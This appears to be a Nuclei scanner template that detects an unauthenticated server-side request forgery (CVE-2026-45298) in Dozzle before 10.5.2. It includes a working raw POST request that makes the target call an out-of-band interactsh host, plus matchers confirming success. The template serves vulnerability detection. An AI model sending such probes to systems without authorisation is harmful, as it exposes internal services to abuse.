id: CVE-2026-45298 info: name: Dozzle - Server Side Request Forgery author: theamanrawat severity: high description: | Dozzle prior to 10.5.2 contains a server-side request forgery caused by unauthenticated access to POST /api/notifications/test-webhook forwarding attacker-controlled URLs, letting remote attackers send arbitrary HTTP POST requests and receive response data, exploit requires no authentication. impact: | Remote attackers can send arbitrary HTTP POST requests and retrieve response data, potentially exposing internal services or sensitive information. remediation: | Update to version 10.5.2 or later. reference: - https://github.com/amir20/dozzle/security/advisories/GHSA-3v9w-6365-9w54 - https://nvd.nist.gov/vuln/detail/CVE-2026-45298 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2026-45298 epss-score: 0.01491 epss-percentile: 0.71411 cwe-id: CWE-918 metadata: verified: true max-request: 1 tags: cve,cve2026,ssrf,dozzle http: - raw: - | POST /api/notifications/test-webhook HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"url":"http://{{interactsh-url}}","headers":{}} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - 'http' - type: word part: body words: - '"statusCode":200' - type: status status: - 200 # digest: 4a0a00473045022100a8a1d556695895c80ee4bdce960de8ab9ab42570fc6f83d292582eca10513eb502207c056ad111066d96c09e734e55fb52c96c564ffc448b4a51e329b9f80607fffb:922c64590222798bb761d5b6d8e72950